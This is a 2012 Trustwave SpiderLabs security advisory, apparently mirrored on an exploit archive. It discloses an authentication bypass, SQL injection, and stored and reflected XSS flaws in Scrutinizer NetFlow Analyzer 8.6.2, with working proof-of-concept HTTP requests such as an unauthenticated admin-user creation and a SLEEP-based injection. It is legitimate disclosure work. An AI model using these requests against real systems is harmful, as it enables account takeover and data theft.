Skip to content
cyberexploits
webappmultipletext

Scrutinizer NetFlow & sFlow Analyzer - Multiple Vulnerabilities

Scrutinizer NetFlow & sFlow Analyzer - Multiple Vulnerabilities

Published on 2012-04-19

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/multiple/webapps/18750.txt7eac4c3a
raw
Trustwave SpiderLabs Security Advisory TWSL2012-008:

Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer



https://www.trustwave.com/spiderlabs/advisories/TWSL2012-008.txt



Published: 04/11/12

Version: 1.0



Vendor: Plixer International (http://www.plixer.com)

Product: Scrutinizer NetFlow and sFlow Analyzer

Version affected:  8.6.2 (8.6.2.16204) confirmed; others may be vulnerable



Product description:

Network analysis tool for monitoring the overall network health and reports

on which hosts, applications, protocols, etc. that are consuming network

bandwidth.



Credit: Tanya Secker of Trustwave SpiderLabs



Finding 1: HTTP Authentication Bypass Vulnerability

CVE: CVE-2012-1258



The Scrutinizer web console provides a form-based login facility, requiring

users to authenticate to gain access to further functionality. A tiered

user access model is also used, where administrative and standard users

have a different selection of permissible functions. Authentication and

authorization is controlled by the cookie-based session management system.

Although this is implemented in a standardized way, the session tokens are

not required to perform privileged functions, such as adding users.



Example:



This request will add a user named "trustwave" with the password of

"trustwave" to the administrative user group.



#Request

GET /cgi-bin/userprefs.cgi?newUser=trustwave&pwd=trustwave&selectedUserGroup=1&= HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729)

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 115

Proxy-Connection: keep-alive

#Response

HTTP/1.1 200 OK

Date: Thu, 17 Nov 2011 10:19:25 GMT

Server: Apache

Vary: Accept-Encoding

Content-Type: text/html; charset=utf-8

Content-Length: 19



{"new_user_id":"9"}





Finding 2: SQL Injection

CVE: CVE-2012-1259



The Scrutinizer web console is prone to unauthenticated SQL Injection

attacks due to user input not being appropriately validated and passed

directly to the backend.  An attacker could exploit this vulnerability to

attempt to gain access to sensitive information within the database or to

perform other attacks on the system.



Example 1:



These requests/responses below show a blind SQL injection vector, where a

proof of concept is used to return a syntactically correct response from

the server (200 OK) followed by an incorrect one (500 Internal Server

Error).



#Request 1

GET /cgi-bin/scrut_fa_exclusions.cgi?name%3anew28%3a28=on&name%3anew7%3a7=on&name%3anew27%3a27=on&name%3anew13%3a13=on&standalone=&name%3anew5%3a5=on&name%3anew14%3a14=on&name%3anew9%3a9=on&user_id=&name%3anew23%3a23=on&name%3anew17%3a17=on&name%3anew11%3a11=on&name%3anew24%3a24=on&addip=')%20AND%20('a'='a&name%3anew18%3a18=on&name%3anew21%3a21=on&name%3anew19%3a19=on&name%3anew22%3a22=on&nbaupdate=1&name%3anew12%3a12=on&name%3anew25%3a25=on&name%3anew2%3a2=on&name%3anew1%3a1=on&name%3anew10%3a10=on&name%3anew15%3a15=on&name%3anew26%3a26=on&name%3anew4%3a4=on&name%3anew6%3a6=on HTTP/1.1

Host: 127.0.0.1

Accept: */*

Accept-Language: en

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)

Connection: close

Referer: http://127.0.0.1/cgi-bin/scrut_fa_exclusions.cgi



#Response 1

HTTP/1.1 200 OK

Date: Tue, 31 Jan 2012 23:51:46 GMT

Server: Apache

Vary: Accept-Encoding

Connection: close

Content-Type: text/html; charset=utf-8

Content-Length: 230



#Request 2

GET /cgi-bin/scrut_fa_exclusions.cgi?name%3anew28%3a28=on&name%3anew7%3a7=on&name%3anew27%3a27=on&name%3anew13%3a13=on&standalone=&name%3anew5%3a5=on&name%3anew14%3a14=on&name%3anew9%3a9=on&user_id=&name%3anew23%3a23=on&name%3anew17%3a17=on&name%3anew11%3a11=on&name%3anew24%3a24=on&addip=')%20ANffD%20('a'='a&name%3anew18%3a18=on&name%3anew21%3a21=on&name%3anew19%3a19=on&name%3anew22%3a22=on&nbaupdate=1&name%3anew12%3a12=on&name%3anew25%3a25=on&name%3anew2%3a2=on&name%3anew1%3a1=on&name%3anew10%3a10=on&name%3anew15%3a15=on&name%3anew26%3a26=on&name%3anew4%3a4=on&name%3anew6%3a6=on HTTP/1.1

Host: 127.0.0.1

Accept: */*

Accept-Language: en

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)

Connection: close

Referer: http://127.0.0.1/cgi-bin/scrut_fa_exclusions.cgi



#Response 2

HTTP/1.1 500 Internal Server Error

Date: Tue, 31 Jan 2012 23:52:18 GMT

Server: Apache

Last-Modified: Fri, 17 Dec 2010 02:01:03 GMT

ETag: "900000001d93e-448-497918ae295c0"

Accept-Ranges: bytes

Content-Length: 1096

Vary: Accept-Encoding

Connection: close

Content-Type: text/html



Example 2:



The "getPermissionsAndPreferences" variable within the following request is

also vulnerable to a blind time-based attack.  The example payload included

will result in the server taking a delay of approximately five seconds

before returning a response.



#Request

http://127.0.0.1/cgi-bin/login.cgi?getPermissionsAndPreferences=1%20AND%20SLEEP(5)&session_id=OyAOiECuFdtRbEBY&nocache=12_13_12_734



Example 3:



It should be noted that the other area referenced below returns SQL errors

when a comment character is introduced into the bolded parameters and may

therefore also indicate that they are vulnerable to SQL injection.  The

below request demonstrates this activity.



#Request

http://127.0.0.1/d4d/alarms.php?loadAlarms=1&user_id=1&step=10&page=0&search_str=test&column=msg&fa_algorithm=all&order=modified_ts





Finding 3: Persistent Cross-site Scripting

CVE: CVE-2012-1260



The Scrutinizer web console stores unmodified user-supplied parameters

within its database.  No input validation or character encoding is

performed, resulting in the possibility of client-supplied variables

forming aspects of page content in such a way as to affect the syntax of

the HTML content.



Example:



The below requests/response demonstrate how an attacker could use this to

implant arbitrary Javascript via the "newUser" parameter.



#Request 1

GET /cgi-bin/userprefs.cgi?newUser=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&pwd=guest2&selectedUserGroup=1&= HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729)

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 115

Proxy-Connection: keep-alive

Content-Length: 6



Accessing the "Admin" Panel using the below URL results in the stored

JavaScript executing in the browser. It is noted that due to the previous

flaw documented above this may also be executed unauthenticated and results

in the disclosure of all user group names and IDs, along with all usernames

and userids stored in the application. This is achieved via the following

URL:



#Request 2

http://127.0.0.1/cgi-bin/userprefs.cgi?menu=1&nocache=5_26_33_895



#Response 2

HTTP/1.1 200 OK

Date: Thu, 17 Nov 2011 10:40:34 GMT

Server: Apache

Vary: Accept-Encoding

Content-Type: text/html; charset=utf-8

Content-Length: 276



{"groups":[{"name":"<script>alert(2)</script>","id":"4"},{"name":"<script>alert(document.cookie)</script>","id":"3"},{"name":"Administrators","id":"1"},{"name":"Guests","id":"2"}],"users":[{"name":"\"><script>alert(1)</script>","user_id":"12"},{"name":"admin","user_id":"1"}]}





Finding 4: Reflected Cross-site Scripting

CVE: CVE-2012-1261



The Scrutinizer web console suffers from a Cross Site Scripting

vulnerability in the 'standalone' variable of the

'cgi-bin/scrut_fa_exclusions.cgi' page.  No input validation or character

encoding is performed, resulting in the possibility of client-supplied

variables forming aspects of page content in such a way as to affect the

syntax of the HTML content.



Example:



The below request demonstrates the reflective cross-site scripting

vulnerability by supplying arbitrary JavaScript to the standalone variable.



#Request

GET /cgi-bin/scrut_fa_exclusions.cgi?init=1&standalone="><script>alert('xss')</script> HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729)

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 115

Proxy-Connection: keep-alive

Referer: http://127.0.0.1/cgi-bin/myview.cgi?init=1

Content-Length: 4



Note: Only one example of each vulnerability is provided but the problem is

categorized as "systemic" due to the potential to store or render script

code within multiple similar regions, such as in user group and alarm

areas, respectively.





Vendor Response:

The vendor has declined to comment on these findings. These issues appear

to have been fixed in version 9.0.1.



Remediation Steps:

Plixer International appeared to address all issues in version 9.0.1

(9.0.1.19899).  It is strongly recommended that the latest stable

version is installed.



Additionally, Trustwave SpiderLabs has added rules to the ModSecurity

Commercial Rules Feed for these issues, and Trustwave's vulnerability

scanning solution, TrustKeeper, has been updated to detect all findings.



References

1. http://www.plixer.com

2. http://blog.spiderlabs.com



Vendor Communication Timeline:

2/15/12: Attempted to contact vendor regarding vulnerability

Repeated attempts throughout February and March without response

04/11/12 - Released after confirming fix in version 9.0.1 (9.0.1.19899)



About Trustwave:

Trustwave is the leading provider of on-demand and subscription-based

information security and payment card industry compliance management

solutions to businesses and government entities throughout the world. For

organizations faced with today's challenging data security and compliance

environment, Trustwave provides a unique approach with comprehensive

solutions that include its flagship TrustKeeper compliance management

software and other proprietary security solutions. Trustwave has helped

thousands of organizations--ranging from Fortune 500 businesses and large

financial institutions to small and medium-sized retailers--manage

compliance and secure their network infrastructure, data communications and

critical information assets. Trustwave is headquartered in Chicago with

offices throughout North America, South America, Europe, Africa, China and

Australia. For more information, visit https://www.trustwave.com



About Trustwave SpiderLabs:

SpiderLabs(R) is the advanced security team at Trustwave focused on

application security, incident response, penetration testing, physical

security and security research. The team has performed over a thousand

incident investigations, thousands of penetration tests and hundreds of

application security tests globally. In addition, the SpiderLabs Research

team provides intelligence through bleeding-edge research and proof of

concept tool development to enhance Trustwave's products and services.

https://www.trustwave.com/spiderlabs



Disclaimer:

The information provided in this advisory is provided "as is" without

warranty of any kind. Trustwave disclaims all warranties, either express or

implied, including the warranties of merchantability and fitness for a

particular purpose. In no event shall Trustwave or its suppliers be liable

for any damages whatsoever including direct, indirect, incidental,

consequential, loss of business profits or special damages, even if

Trustwave or its suppliers have been advised of the possibility of such

damages. Some states do not allow the exclusion or limitation of liability

for consequential or incidental damages so the foregoing limitation may not

apply.



This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.



View on GitHub